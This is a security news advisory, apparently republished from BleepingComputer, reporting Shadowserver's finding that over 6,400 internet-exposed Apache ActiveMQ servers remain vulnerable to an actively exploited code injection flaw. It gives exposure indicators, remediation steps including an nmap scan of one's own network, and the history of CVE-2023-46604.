Nonprofit security organization Shadowserver has confirmed that over 6,400 Apache ActiveMQ servers exposed on the public internet remain vulnerable to ongoing attacks targeting a high-severity code injection vulnerability. The flaw is being actively exploited in the wild, making unpatched instances at immediate and serious risk.
Apache ActiveMQ Overview
Apache ActiveMQ is one of the most widely deployed open-source message brokers in enterprise environments. It implements the Java Message Service (JMS) API and supports a range of messaging protocols including AMQP, MQTT, STOMP, and OpenWire. ActiveMQ is commonly used by:
- Enterprise applications for asynchronous inter-service communication
- Microservices architectures for event streaming and task queuing
- Financial services for reliable transaction messaging
- Healthcare and critical infrastructure for system integration
The widespread deployment of ActiveMQ across critical industries means that active exploitation of this vulnerability poses a broad risk across sectors.
The Vulnerability
The flaw being actively exploited is a high-severity code injection vulnerability in Apache ActiveMQ that allows remote attackers to execute arbitrary code on vulnerable servers. The vulnerability affects servers that have management interfaces or broker ports exposed to the internet without adequate access controls.
Shadowserver's scan identified more than 6,400 internet-facing ActiveMQ instances that remain vulnerable and unpatched — providing attackers a large pool of targets.
Exploitation in the Wild
Active exploitation has been confirmed, meaning threat actors are already scanning for and attacking vulnerable servers. The threat landscape for ActiveMQ vulnerabilities has precedent: in 2023, a prior critical ActiveMQ vulnerability (CVE-2023-46604) was rapidly weaponized by multiple threat actors including ransomware groups and nation-state actors within days of disclosure.
The current wave of exploitation follows a similar pattern:
1. Attackers scan the internet for exposed ActiveMQ management ports
2. Identify instances running a vulnerable version
3. Send crafted messages exploiting the code injection flaw
4. Achieve remote code execution on the target server
5. Deploy malware payloads — frequently ransomware, cryptominers, or remote access toolsVulnerable vs. Patched Versions
Organizations should immediately verify what version of Apache ActiveMQ is deployed in their environment. Administrators should check the Apache ActiveMQ security advisories page for the specific versions affected and the patched release for this vulnerability.
General Exposure Indicators
- ActiveMQ admin console accessible on port 8161 from the internet
- OpenWire protocol port (61616) exposed without firewall restrictions
- Outdated ActiveMQ versions running in production
- Absence of authentication on the ActiveMQ management interface
Immediate Remediation Steps
1. Identify Exposed Instances
Use network scanning and asset inventory tools to identify all ActiveMQ deployments in your environment:
# Scan your network range for ActiveMQ default ports
nmap -p 8161,61616,5672,1883,61613 <network_range>2. Apply the Patch
Update Apache ActiveMQ to the latest patched version immediately. Check the Apache ActiveMQ downloads page for the current stable release.
3. Restrict Network Exposure
If ActiveMQ management interfaces or broker ports are reachable from the internet, restrict access immediately:
- Move ActiveMQ behind a firewall with strict allowlisting
- Require VPN access for administrative interfaces
- Block port 8161 (admin console) and 61616 (OpenWire) from public internet access at the perimeter
4. Enable Authentication
Ensure that the ActiveMQ broker and management console require authentication. Default ActiveMQ installations often have weak or no credentials on the admin console — change all default passwords immediately.
5. Monitor for Compromise Indicators
Review ActiveMQ logs and host-level telemetry for signs of exploitation:
- Unexpected JVM process spawning from the ActiveMQ process
- Unusual outbound network connections from ActiveMQ hosts
- New scheduled tasks, cron jobs, or services created on the host
- Presence of cryptominer or RAT payloads on the system
Historical Context: ActiveMQ as an Attack Target
Apache ActiveMQ has been a recurring target for sophisticated threat actors. CVE-2023-46604, a critical RCE vulnerability disclosed in October 2023, was weaponized within days by:
- HelloKitty ransomware operators
- Lazarus Group (North Korean state-sponsored actors)
- Cryptomining botnets
- Multiple initial access brokers
The rapid exploitation timeline for that prior vulnerability strongly suggests the current flaw will follow a similar pattern. Organizations with internet-exposed ActiveMQ instances should treat this as an emergency patching priority.
Shadowserver's Role
Shadowserver Foundation is a nonprofit that operates global internet scanning infrastructure to identify and notify organizations about exposed, vulnerable systems. Their identification of 6,400+ vulnerable ActiveMQ instances reflects real-time scanning data — and those 6,400 servers represent the minimum count of easy targets available to attackers right now.
Organizations can check if their IPs appear in Shadowserver's vulnerable-host notifications by registering at shadowserver.org.
Key Takeaways
- 6,400+ internet-exposed Apache ActiveMQ servers remain vulnerable to an actively exploited high-severity code injection flaw
- Patch immediately — update to the latest patched ActiveMQ release without delay
- Remove internet exposure — ActiveMQ management interfaces should never be reachable from the public internet
- Enable strong authentication on all ActiveMQ admin interfaces and change any default credentials
- Monitor for compromise — systems that were exposed before patching should be treated as potentially compromised and investigated
Source: BleepingComputer